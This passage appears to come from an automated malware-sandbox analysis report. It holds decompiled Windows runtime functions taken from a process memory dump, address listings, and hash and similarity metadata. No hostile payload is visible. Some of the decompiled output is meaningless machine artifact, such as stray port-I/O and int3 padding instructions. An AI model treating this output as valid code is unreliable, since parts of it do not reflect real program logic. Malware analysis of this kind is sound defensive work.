                                                                                  								__eax =  *0xf96e58 & 0x0000ffff;
                                                                                  								__eax = ( *0xf96e58 & 0x0000ffff) + 2;
                                                                                  								L53:
                                                                                  								__ebx = __ebx + __eax;
                                                                                  								L14:
                                                                                  								_t326 = _t326 + 1;
                                                                                  								if(_t326 >= _v48) {
                                                                                  									goto L16;
                                                                                  								} else {
                                                                                  									_t315 = _v37;
                                                                                  									goto L1;
                                                                                  								}
                                                                                  								goto L108;
                                                                                  						}
                                                                                  					}
                                                                                  					L56:
                                                                                  					_t299 = 0x25;
                                                                                  					asm("int 0x29");
                                                                                  					asm("out 0x28, al");
                                                                                  					asm("in eax, dx");
                                                                                  					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t247;
                                                                                  					asm("in eax, dx");
                                                                                  					_t248 = _t247 + _t247;
                                                                                  					asm("daa");
                                                                                  					asm("in eax, dx");
                                                                                  					 *_t333 =  *_t333 + _t299;
                                                                                  					asm("in eax, dx");
                                                                                  					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t248;
                                                                                  					asm("in eax, dx");
                                                                                  					 *0x1f00ed26 =  *0x1f00ed26 + _t248;
                                                                                  					_pop(_t289);
                                                                                  					asm("int1");
                                                                                  					 *((intOrPtr*)(_t248 +  &_a1530200297)) =  *((intOrPtr*)(_t248 +  &_a1530200297)) + _t315;
                                                                                  					asm("int1");
                                                                                  					 *_t315 =  *_t315 + _t248;
                                                                                  					 *((intOrPtr*)(_t248 - 0x9ff12d8)) =  *((intOrPtr*)(_t248 - 0x9ff12d8)) + _t248;
                                                                                  					asm("daa");
                                                                                  					asm("in eax, dx");
                                                                                  					 *_t333 =  *_t333 + _t289;
                                                                                  					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28));
                                                                                  					asm("in eax, dx");
                                                                                  					 *0x00000027 =  *((intOrPtr*)(0x27)) + _t289;
                                                                                  					asm("in eax, dx");
                                                                                  					_pop(_t290);
                                                                                  					asm("int1");
                                                                                  					 *((intOrPtr*)(_t248 + _t289 + 0x5c3400ed)) =  *((intOrPtr*)(_t248 + _t289 + 0x5c3400ed)) + _t315;
                                                                                  					asm("int1");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					_push(0x20);
                                                                                  					_push(0xf7ff00);
                                                                                  					E00EFD08C(_t290, _t328, _t333);
                                                                                  					 *0xFFFFFFFFFFFFFFD8 =  *[fs:0x18];
                                                                                  					_t329 = 0;
                                                                                  					 *((intOrPtr*)( *0x0000001C)) = 0;
                                                                                  					_t291 =  *0x00000010;
                                                                                  					__eflags = _t291;
                                                                                  					if(_t291 == 0) {
                                                                                  						_t253 = 0xc0000100;
                                                                                  					} else {
                                                                                  						 *0xFFFFFFFFFFFFFFFC = 0;
                                                                                  						_t336 = 0xc0000100;
                                                                                  						 *0xFFFFFFFFFFFFFFD0 = 0xc0000100;
                                                                                  						_t255 = 4;
                                                                                  						while(1) {
                                                                                  							_v40 = _t255;
                                                                                  							__eflags = _t255;
                                                                                  							if(_t255 == 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t305 = _t255 * 0xc;
                                                                                  							_v48 = _t305;
                                                                                  							__eflags = _t291 -  *((intOrPtr*)(_t305 + 0xe81664));
                                                                                  							if(__eflags <= 0) {
                                                                                  								if(__eflags == 0) {
                                                                                  									_t270 = E00EEE5C0(_a8,  *((intOrPtr*)(_t305 + 0xe81668)), _t291);
                                                                                  									_t342 = _t342 + 0xc;
                                                                                  									__eflags = _t270;
                                                                                  									if(__eflags == 0) {
                                                                                  										_t336 = E00F251BE(_t291,  *((intOrPtr*)(_v48 + 0xe8166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
                                                                                  										_v52 = _t336;
                                                                                  										break;
                                                                                  									} else {
                                                                                  										_t255 = _v40;
                                                                                  										goto L62;
                                                                                  									}
                                                                                  									goto L70;
                                                                                  								} else {
                                                                                  									L62:
                                                                                  									_t255 = _t255 - 1;
                                                                                  									continue;
                                                                                  								}
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						_v32 = _t336;
                                                                                  						__eflags = _t336;
                                                                                  						if(_t336 < 0) {
                                                                                  							__eflags = _t336 - 0xc0000100;
                                                                                  							if(_t336 == 0xc0000100) {
                                                                                  								_t301 = _a4;
                                                                                  								__eflags = _t301;
                                                                                  								if(_t301 != 0) {
                                                                                  									_v36 = _t301;
                                                                                  									__eflags =  *_t301 - _t329;
                                                                                  									if( *_t301 == _t329) {
                                                                                  										_t336 = 0xc0000100;
                                                                                  										goto L76;
                                                                                  									} else {
                                                                                  										_t317 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                  										_t257 =  *((intOrPtr*)(_t317 + 0x10));
                                                                                  										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t301;
                                                                                  										if( *((intOrPtr*)(_t257 + 0x48)) == _t301) {
                                                                                  											__eflags =  *(_t317 + 0x1c);
                                                                                  											if( *(_t317 + 0x1c) == 0) {
                                                                                  												L106:
                                                                                  												_t336 = E00ED2AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
                                                                                  												_v32 = _t336;
                                                                                  												__eflags = _t336 - 0xc0000100;
                                                                                  												if(_t336 != 0xc0000100) {
                                                                                  													goto L69;
                                                                                  												} else {
                                                                                  													_t329 = 1;
                                                                                  													_t301 = _v36;
                                                                                  													goto L75;
                                                                                  												}
                                                                                  											} else {
                                                                                  												_t260 = E00EB6600( *(_t317 + 0x1c));
                                                                                  												__eflags = _t260;
                                                                                  												if(_t260 != 0) {
                                                                                  													goto L106;
                                                                                  												} else {
                                                                                  													_t301 = _a4;
                                                                                  													goto L75;
                                                                                  												}
                                                                                  											}
                                                                                  										} else {
                                                                                  											L75:
                                                                                  											_t336 = E00ED2C50(_t301, _a8, _t291, _a16, _a20, _a24, _t329);
                                                                                  											L76:
                                                                                  											_v32 = _t336;
                                                                                  											goto L69;
                                                                                  										}
                                                                                  									}
                                                                                  									goto L108;
                                                                                  								} else {
                                                                                  									E00EBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                  									_v8 = 1;
                                                                                  									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                  									_t336 = _a24;
                                                                                  									_t267 = E00ED2AE4( &_v36, _a8, _t291, _a16, _a20, _t336);
                                                                                  									_v32 = _t267;
                                                                                  									__eflags = _t267 - 0xc0000100;
                                                                                  									if(_t267 == 0xc0000100) {
                                                                                  										_v32 = E00ED2C50(_v36, _a8, _t291, _a16, _a20, _t336, 1);
                                                                                  									}
                                                                                  									_v8 = _t329;
                                                                                  									E00ED2ACB();
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						L69:
                                                                                  						_v8 = 0xfffffffe;
                                                                                  						_t253 = _t336;
                                                                                  					}
                                                                                  					L70:
                                                                                  					return E00EFD0D1(_t253);
                                                                                  				}
                                                                                  				L108:
                                                                                  			}




















































                                                                                  0x00ed270a
                                                                                  0x00ed270a
                                                                                  0x00ed270d
                                                                                  0x00ed2713
                                                                                  0x00ed2716
                                                                                  0x00ed2718
                                                                                  0x00ed271c
                                                                                  0x00ed271e
                                                                                  0x00f15b6c
                                                                                  0x00f15b6f
                                                                                  0x00f15b7f
                                                                                  0x00f15b89
                                                                                  0x00f15b8e
                                                                                  0x00f15b93
                                                                                  0x00f15b96
                                                                                  0x00f15b9c
                                                                                  0x00f15ba0
                                                                                  0x00f15ba3
                                                                                  0x00f15bab
                                                                                  0x00f15bb0
                                                                                  0x00f15bb3
                                                                                  0x00f15bb3
                                                                                  0x00f15ba3
                                                                                  0x00ed2724
                                                                                  0x00ed2726
                                                                                  0x00ed2729
                                                                                  0x00ed272c
                                                                                  0x00ed279d
                                                                                  0x00ed279d
                                                                                  0x00ed27a0
                                                                                  0x00ed27a2
                                                                                  0x00000000
                                                                                  0x00ed272e
                                                                                  0x00ed272e
                                                                                  0x00ed2731
                                                                                  0x00ed2734
                                                                                  0x00ed2734
                                                                                  0x00ed2736
                                                                                  0x00f15bc1
                                                                                  0x00f15bc1
                                                                                  0x00f15bc4
                                                                                  0x00000000
                                                                                  0x00f15bca
                                                                                  0x00f15bca
                                                                                  0x00f15bcd
                                                                                  0x00000000
                                                                                  0x00f15bd3
                                                                                  0x00000000
                                                                                  0x00f15bd3
                                                                                  0x00f15bcd
                                                                                  0x00ed273c
                                                                                  0x00ed273c
                                                                                  0x00ed2742
                                                                                  0x00ed2747
                                                                                  0x00ed274a
                                                                                  0x00ed274d
                                                                                  0x00ed2750
                                                                                  0x00000000
                                                                                  0x00ed2756
                                                                                  0x00ed2756
                                                                                  0x00000000
                                                                                  0x00ed2902
                                                                                  0x00ed2908
                                                                                  0x00ed290b
                                                                                  0x00000000
                                                                                  0x00ed2911
                                                                                  0x00ed291c
                                                                                  0x00ed2921
                                                                                  0x00000000
                                                                                  0x00ed2921
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2880
                                                                                  0x00ed2887
                                                                                  0x00ed288c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2805
                                                                                  0x00ed280a
                                                                                  0x00ed2814
                                                                                  0x00ed2816
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed281e
                                                                                  0x00ed2821
                                                                                  0x00ed2823
                                                                                  0x00000000
                                                                                  0x00ed2829
                                                                                  0x00ed2829
                                                                                  0x00ed2831
                                                                                  0x00ed283c
                                                                                  0x00ed283e
                                                                                  0x00000000
                                                                                  0x00ed283e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed284e
                                                                                  0x00ed2850
                                                                                  0x00ed2851
                                                                                  0x00ed2854
                                                                                  0x00ed2857
                                                                                  0x00ed285a
                                                                                  0x00ed285c
                                                                                  0x00ed285d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed275d
                                                                                  0x00ed2761
                                                                                  0x00000000
                                                                                  0x00ed2767
                                                                                  0x00ed276e
                                                                                  0x00ed2773
                                                                                  0x00ed2773
                                                                                  0x00ed2776
                                                                                  0x00ed2778
                                                                                  0x00ed277e
                                                                                  0x00ed277e
                                                                                  0x00ed2781
                                                                                  0x00ed2781
                                                                                  0x00ed2783
                                                                                  0x00ed2784
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f15bd8
                                                                                  0x00f15bde
                                                                                  0x00f15be4
                                                                                  0x00f15be6
                                                                                  0x00f15be8
                                                                                  0x00f15be9
                                                                                  0x00f15bee
                                                                                  0x00f15bf8
                                                                                  0x00f15bff
                                                                                  0x00f15c01
                                                                                  0x00f15c04
                                                                                  0x00f15c07
                                                                                  0x00f15c0b
                                                                                  0x00f15c0d
                                                                                  0x00f15c0d
                                                                                  0x00f15c15
                                                                                  0x00f15c18
                                                                                  0x00f15c1b
                                                                                  0x00f15c1b
                                                                                  0x00f15c1e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed28c3
                                                                                  0x00ed28c8
                                                                                  0x00ed28d2
                                                                                  0x00ed28d4
                                                                                  0x00ed28d8
                                                                                  0x00ed28db
                                                                                  0x00f15c26
                                                                                  0x00f15c28
                                                                                  0x00f15c2d
                                                                                  0x00f15c2d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f15c34
                                                                                  0x00f15c36
                                                                                  0x00f15c49
                                                                                  0x00f15c4e
                                                                                  0x00f15c54
                                                                                  0x00f15c5b
                                                                                  0x00f15c5d
                                                                                  0x00f15c60
                                                                                  0x00ed2788
                                                                                  0x00ed2788
                                                                                  0x00ed278b
                                                                                  0x00ed278e
                                                                                  0x00ed278e
                                                                                  0x00ed278e
                                                                                  0x00ed2791
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2756
                                                                                  0x00ed2750
                                                                                  0x00000000
                                                                                  0x00ed2794
                                                                                  0x00ed2794
                                                                                  0x00ed2795
                                                                                  0x00ed2798
                                                                                  0x00ed2798
                                                                                  0x00000000
                                                                                  0x00ed2734
                                                                                  0x00ed272c
                                                                                  0x00ed2700
                                                                                  0x00ed25ef
                                                                                  0x00ed25ef
                                                                                  0x00ed25ef
                                                                                  0x00ed25f2
                                                                                  0x00ed25f8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed25fe
                                                                                  0x00000000
                                                                                  0x00ed28e6
                                                                                  0x00ed28ec
                                                                                  0x00ed28ef
                                                                                  0x00ed28f5
                                                                                  0x00ed28f8
                                                                                  0x00ed28f8
                                                                                  0x00000000
                                                                                  0x00ed28f8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2866
                                                                                  0x00ed2866
                                                                                  0x00ed2876
                                                                                  0x00ed2879
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed27e0
                                                                                  0x00ed27e7
                                                                                  0x00ed27e9
                                                                                  0x00ed27eb
                                                                                  0x00f15afd
                                                                                  0x00000000
                                                                                  0x00f15afd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ed2633
                                                                                  0x00ed2638
                                                                                  0x00ed263b
                                                                                  0x00ed263c
                                                                                  0x00ed263e
                                                                                  0x00ed2640
                                                                                  0x00ed2642
                                                                                  0x00ed2647
                                                                                  0x00ed2649
                                                                                  0x00ed264e
                                                                                  0x00ed2650
                                                                                  0x00ed2653
                                                                                  0x00ed2659
                                                                                  0x00ed26a2
                                                                                  0x00ed26a7
                                                                                  0x00ed26ac
                                                                                  0x00ed26b2
                                                                                  0x00f15b11
                                                                                  0x00f15b15
                                                                                  0x00f15b17
                                                                                  0x00000000
                                                                                  0x00ed26b8
                                                                                  0x00ed26b8
                                                                                  0x00ed26ba
                                                                                  0x00ed27a6
                                                                                  0x00ed27a6
                                                                                  0x00ed27a9
                                                                                  0x00ed27ab
                                                                                  0x00ed27b9
                                                                                  0x00ed27b9
                                                                                  0x00ed27be
                                                                                  0x00ed27c1
                                                                                  0x00ed27c3
                                                                                  0x00ed27c5
                                                                                  0x00ed27c7
                                                                                  0x00f15c74
                                                                                  0x00f15c79
                                                                                  0x00f15c79
                                                                                  0x00ed27c7
                                                                                  0x00000000
                                                                                  0x00ed26c0
                                                                                  0x00ed26c0
                                                                                  0x00ed26c3
                                                                                  0x00ed26c6
                                                                                  0x00ed26c6
                                                                                  0x00ed26c9
                                                                                  0x00ed26c9
                                                                                  0x00000000
                                                                                  0x00ed26c9
                                                                                  0x00ed26ba
                                                                                  0x00ed265b
                                                                                  0x00ed265b
                                                                                  0x00ed265e
                                                                                  0x00ed2667
                                                                                  0x00ed266d
                                                                                  0x00ed2677
                                                                                  0x00ed267c
                                                                                  0x00ed267f
                                                                                  0x00ed2681
                                                                                  0x00f15b49
                                                                                  0x00f15b4e
                                                                                  0x00ed27cd
                                                                                  0x00ed27d0
                                                                                  0x00ed27d1
                                                                                  0x00ed27d2
                                                                                  0x00ed27d4
                                                                                  0x00ed27dd
                                                                                  0x00ed2687
                                                                                  0x00ed2687
                                                                                  0x00ed268a
                                                                                  0x00ed268b
                                                                                  0x00ed268e
                                                                                  0x00ed268f
                                                                                  0x00ed2691
                                                                                  0x00ed2696
                                                                                  0x00ed2698
                                                                                  0x00ed269d
                                                                                  0x00ed269f
                                                                                  0x00000000
                                                                                  0x00ed269f
                                                                                  0x00ed2681

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PATH
                                                                                  • API String ID: 0-1036084923
                                                                                  • Opcode ID: 474b7de2657b3cf1143a8d686520e490e795898547b3154f57fd6443d8d963b8
                                                                                  • Instruction ID: 04370afe46a67ceff0626a96290209f548bf532b78d58c847b73c0d216039992
                                                                                  • Opcode Fuzzy Hash: 474b7de2657b3cf1143a8d686520e490e795898547b3154f57fd6443d8d963b8
                                                                                  • Instruction Fuzzy Hash: E1C18B71E00219DBCB25DFA9D891AEEB7B1FF98700F14502EEA11BB350D735A942DB60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E00EDFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                  				char _v5;
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				char _v16;
                                                                                  				char _v17;
                                                                                  				char _v20;
                                                                                  				signed int _v24;
                                                                                  				char _v28;
                                                                                  				char _v32;
                                                                                  				signed int _v40;
                                                                                  				void* __ecx;
                                                                                  				void* __edi;
                                                                                  				void* __ebp;
                                                                                  				signed int _t73;
                                                                                  				intOrPtr* _t75;
                                                                                  				signed int _t77;
                                                                                  				signed int _t79;
                                                                                  				signed int _t81;
                                                                                  				intOrPtr _t83;
                                                                                  				intOrPtr _t85;
                                                                                  				intOrPtr _t86;
                                                                                  				signed int _t91;
                                                                                  				signed int _t94;
                                                                                  				signed int _t95;
                                                                                  				signed int _t96;
                                                                                  				signed int _t106;
                                                                                  				signed int _t108;
                                                                                  				signed int _t114;
                                                                                  				signed int _t116;
                                                                                  				signed int _t118;
                                                                                  				signed int _t122;
                                                                                  				signed int _t123;
                                                                                  				void* _t129;
                                                                                  				signed int _t130;
                                                                                  				void* _t132;
                                                                                  				intOrPtr* _t134;
                                                                                  				signed int _t138;
                                                                                  				signed int _t141;
                                                                                  				signed int _t147;
                                                                                  				intOrPtr _t153;
                                                                                  				signed int _t154;
                                                                                  				signed int _t155;
                                                                                  				signed int _t170;
                                                                                  				void* _t174;
                                                                                  				signed int _t176;
                                                                                  				signed int _t177;
                                                                                  
                                                                                  				_t129 = __ebx;
                                                                                  				_push(_t132);
                                                                                  				_push(__esi);
                                                                                  				_t174 = _t132;
                                                                                  				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                  				if(_t73 >= 0) {
                                                                                  					L5:
                                                                                  					return _t73;
                                                                                  				} else {
                                                                                  					E00EBEEF0(0xf97b60);
                                                                                  					_t134 =  *0xf97b84; // 0x77ad7b80
                                                                                  					_t2 = _t174 + 0x24; // 0x24
                                                                                  					_t75 = _t2;
                                                                                  					if( *_t134 != 0xf97b80) {
                                                                                  						_push(3);
                                                                                  						asm("int 0x29");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						asm("int3");
                                                                                  						_push(0xf97b60);
                                                                                  						_t170 = _v8;
                                                                                  						_v28 = 0;
                                                                                  						_v40 = 0;
                                                                                  						_v24 = 0;
                                                                                  						_v17 = 0;
                                                                                  						_v32 = 0;
                                                                                  						__eflags = _t170 & 0xffff7cf2;
                                                                                  						if((_t170 & 0xffff7cf2) != 0) {
                                                                                  							L43:
                                                                                  							_t77 = 0xc000000d;
                                                                                  						} else {
                                                                                  							_t79 = _t170 & 0x0000000c;
                                                                                  							__eflags = _t79;
                                                                                  							if(_t79 != 0) {
                                                                                  								__eflags = _t79 - 0xc;
                                                                                  								if(_t79 == 0xc) {
                                                                                  									goto L43;
                                                                                  								} else {
                                                                                  									goto L9;
                                                                                  								}
                                                                                  							} else {
                                                                                  								_t170 = _t170 | 0x00000008;
                                                                                  								__eflags = _t170;
                                                                                  								L9:
                                                                                  								_t81 = _t170 & 0x00000300;
                                                                                  								__eflags = _t81 - 0x300;
                                                                                  								if(_t81 == 0x300) {
                                                                                  									goto L43;
                                                                                  								} else {
                                                                                  									_t138 = _t170 & 0x00000001;
                                                                                  									__eflags = _t138;
                                                                                  									_v24 = _t138;
                                                                                  									if(_t138 != 0) {
                                                                                  										__eflags = _t81;
                                                                                  										if(_t81 != 0) {
                                                                                  											goto L43;
                                                                                  										} else {
                                                                                  											goto L11;
                                                                                  										}
                                                                                  									} else {
                                                                                  										L11:
                                                                                  										_push(_t129);
                                                                                  										_t77 = E00EB6D90( &_v20);
                                                                                  										_t130 = _t77;
                                                                                  										__eflags = _t130;
                                                                                  										if(_t130 >= 0) {
                                                                                  											_push(_t174);
                                                                                  											__eflags = _t170 & 0x00000301;
                                                                                  											if((_t170 & 0x00000301) == 0) {
                                                                                  												_t176 = _a8;
                                                                                  												__eflags = _t176;
                                                                                  												if(__eflags == 0) {
                                                                                  													L64:
                                                                                  													_t83 =  *[fs:0x18];
                                                                                  													_t177 = 0;
                                                                                  													__eflags =  *(_t83 + 0xfb8);
                                                                                  													if( *(_t83 + 0xfb8) != 0) {
                                                                                  														E00EB76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                  														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                  													}
                                                                                  													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                  													goto L15;
                                                                                  												} else {
                                                                                  													asm("sbb edx, edx");
                                                                                  													_t114 = E00F48938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                  													__eflags = _t114;
                                                                                  													if(_t114 < 0) {
                                                                                  														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                  														E00EAB150();
                                                                                  													}
                                                                                  													_t116 = E00F46D81(_t176,  &_v16);
                                                                                  													__eflags = _t116;
                                                                                  													if(_t116 >= 0) {
                                                                                  														__eflags = _v16 - 2;
                                                                                  														if(_v16 < 2) {
                                                                                  															L56:
                                                                                  															_t118 = E00EB75CE(_v20, 5, 0);
                                                                                  															__eflags = _t118;
                                                                                  															if(_t118 < 0) {
                                                                                  																L67:
                                                                                  																_t130 = 0xc0000017;
                                                                                  																goto L32;
                                                                                  															} else {
                                                                                  																__eflags = _v12;
                                                                                  																if(_v12 == 0) {
                                                                                  																	goto L67;
                                                                                  																} else {
                                                                                  																	_t153 =  *0xf98638; // 0x0
                                                                                  																	_t122 = L00EB38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                  																	_t154 = _v12;
                                                                                  																	_t130 = _t122;
                                                                                  																	__eflags = _t130;
                                                                                  																	if(_t130 >= 0) {
                                                                                  																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                  																		__eflags = _t123;
                                                                                  																		if(_t123 != 0) {
                                                                                  																			_t155 = _a12;
                                                                                  																			__eflags = _t155;
                                                                                  																			if(_t155 != 0) {
                                                                                  																				 *_t155 = _t123;
                                                                                  																			}
                                                                                  																			goto L64;
                                                                                  																		} else {
                                                                                  																			E00EB76E2(_t154);
                                                                                  																			goto L41;
                                                                                  																		}
                                                                                  																	} else {
                                                                                  																		E00EB76E2(_t154);
                                                                                  																		_t177 = 0;
                                                                                  																		goto L18;
                                                                                  																	}
                                                                                  																}
                                                                                  															}
                                                                                  														} else {
                                                                                  															__eflags =  *_t176;
                                                                                  															if( *_t176 != 0) {
                                                                                  																goto L56;
                                                                                  															} else {
                                                                                  																__eflags =  *(_t176 + 2);
                                                                                  																if( *(_t176 + 2) == 0) {
                                                                                  																	goto L64;
                                                                                  																} else {
                                                                                  																	goto L56;
                                                                                  																}
                                                                                  															}
                                                                                  														}
                                                                                  													} else {
                                                                                  														_t130 = 0xc000000d;
                                                                                  														goto L32;
                                                                                  													}
                                                                                  												}
                                                                                  												goto L35;
                                                                                  											} else {
                                                                                  												__eflags = _a8;
                                                                                  												if(_a8 != 0) {
                                                                                  													_t77 = 0xc000000d;
                                                                                  												} else {
                                                                                  													_v5 = 1;
                                                                                  													L00EDFCE3(_v20, _t170);
                                                                                  													_t177 = 0;
                                                                                  													__eflags = 0;
                                                                                  													L15:
                                                                                  													_t85 =  *[fs:0x18];
                                                                                  													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                  													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                  														L18:
                                                                                  														__eflags = _t130;
                                                                                  														if(_t130 != 0) {
                                                                                  															goto L32;
                                                                                  														} else {
                                                                                  															__eflags = _v5 - _t130;
                                                                                  															if(_v5 == _t130) {
                                                                                  																goto L32;
                                                                                  															} else {
                                                                                  																_t86 =  *[fs:0x18];
                                                                                  																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                  																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                  																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                  																}
                                                                                  																__eflags = _t177;
                                                                                  																if(_t177 == 0) {
                                                                                  																	L31:
                                                                                  																	__eflags = 0;
                                                                                  																	L00EB70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                  																	goto L32;
                                                                                  																} else {
                                                                                  																	__eflags = _v24;
                                                                                  																	_t91 =  *(_t177 + 0x20);
                                                                                  																	if(_v24 != 0) {
                                                                                  																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                  																		goto L31;
                                                                                  																	} else {
                                                                                  																		_t141 = _t91 & 0x00000040;
                                                                                  																		__eflags = _t170 & 0x00000100;
                                                                                  																		if((_t170 & 0x00000100) == 0) {
                                                                                  																			__eflags = _t141;
                                                                                  																			if(_t141 == 0) {
                                                                                  																				L74:
                                                                                  																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                  																				goto L27;
                                                                                  																			} else {
                                                                                  																				_t177 = E00EDFD22(_t177);
                                                                                  																				__eflags = _t177;
                                                                                  																				if(_t177 == 0) {
                                                                                  																					goto L42;
                                                                                  																				} else {
                                                                                  																					_t130 = E00EDFD9B(_t177, 0, 4);
                                                                                  																					__eflags = _t130;
                                                                                  																					if(_t130 != 0) {
                                                                                  																						goto L42;
                                                                                  																					} else {
                                                                                  																						_t68 = _t177 + 0x20;
                                                                                  																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                  																						__eflags =  *_t68;
                                                                                  																						_t91 =  *(_t177 + 0x20);
                                                                                  																						goto L74;
                                                                                  																					}
                                                                                  																				}
                                                                                  																			}
                                                                                  																			goto L35;
                                                                                  																		} else {
                                                                                  																			__eflags = _t141;
                                                                                  																			if(_t141 != 0) {
                                                                                  																				_t177 = E00EDFD22(_t177);
                                                                                  																				__eflags = _t177;
                                                                                  																				if(_t177 == 0) {
                                                                                  																					L42:
                                                                                  																					_t77 = 0xc0000001;
                                                                                  																					goto L33;
                                                                                  																				} else {
                                                                                  																					_t130 = E00EDFD9B(_t177, 0, 4);
                                                                                  																					__eflags = _t130;
                                                                                  																					if(_t130 != 0) {
                                                                                  																						goto L42;
                                                                                  																					} else {
                                                                                  																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                  																						_t91 =  *(_t177 + 0x20);
                                                                                  																						goto L26;
                                                                                  																					}
                                                                                  																				}
                                                                                  																				goto L35;
                                                                                  																			} else {
                                                                                  																				L26:
                                                                                  																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                  																				__eflags = _t94;
                                                                                  																				L27:
                                                                                  																				 *(_t177 + 0x20) = _t94;
                                                                                  																				__eflags = _t170 & 0x00008000;
                                                                                  																				if((_t170 & 0x00008000) != 0) {
                                                                                  																					_t95 = _a12;
                                                                                  																					__eflags = _t95;
                                                                                  																					if(_t95 != 0) {
                                                                                  																						_t96 =  *_t95;
                                                                                  																						__eflags = _t96;
                                                                                  																						if(_t96 != 0) {
                                                                                  																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                  																							_t40 = _t177 + 0x20;
                                                                                  																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                  																							__eflags =  *_t40;
                                                                                  																						}
                                                                                  																					}
                                                                                  																				}
                                                                                  																				goto L31;
                                                                                  																			}
                                                                                  																		}
                                                                                  																	}
                                                                                  																}
                                                                                  															}
                                                                                  														}
                                                                                  													} else {
                                                                                  														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                  														_t106 =  *(_t147 + 0x20);
                                                                                  														__eflags = _t106 & 0x00000040;
                                                                                  														if((_t106 & 0x00000040) != 0) {
                                                                                  															_t147 = E00EDFD22(_t147);
                                                                                  															__eflags = _t147;
                                                                                  															if(_t147 == 0) {
                                                                                  																L41:
                                                                                  																_t130 = 0xc0000001;
                                                                                  																L32:
                                                                                  																_t77 = _t130;
                                                                                  																goto L33;
                                                                                  															} else {
                                                                                  																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                  																_t106 =  *(_t147 + 0x20);
                                                                                  																goto L17;
                                                                                  															}
                                                                                  															goto L35;
                                                                                  														} else {
                                                                                  															L17:
                                                                                  															_t108 = _t106 | 0x00000080;
                                                                                  															__eflags = _t108;
                                                                                  															 *(_t147 + 0x20) = _t108;
                                                                                  															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                  															goto L18;
                                                                                  														}
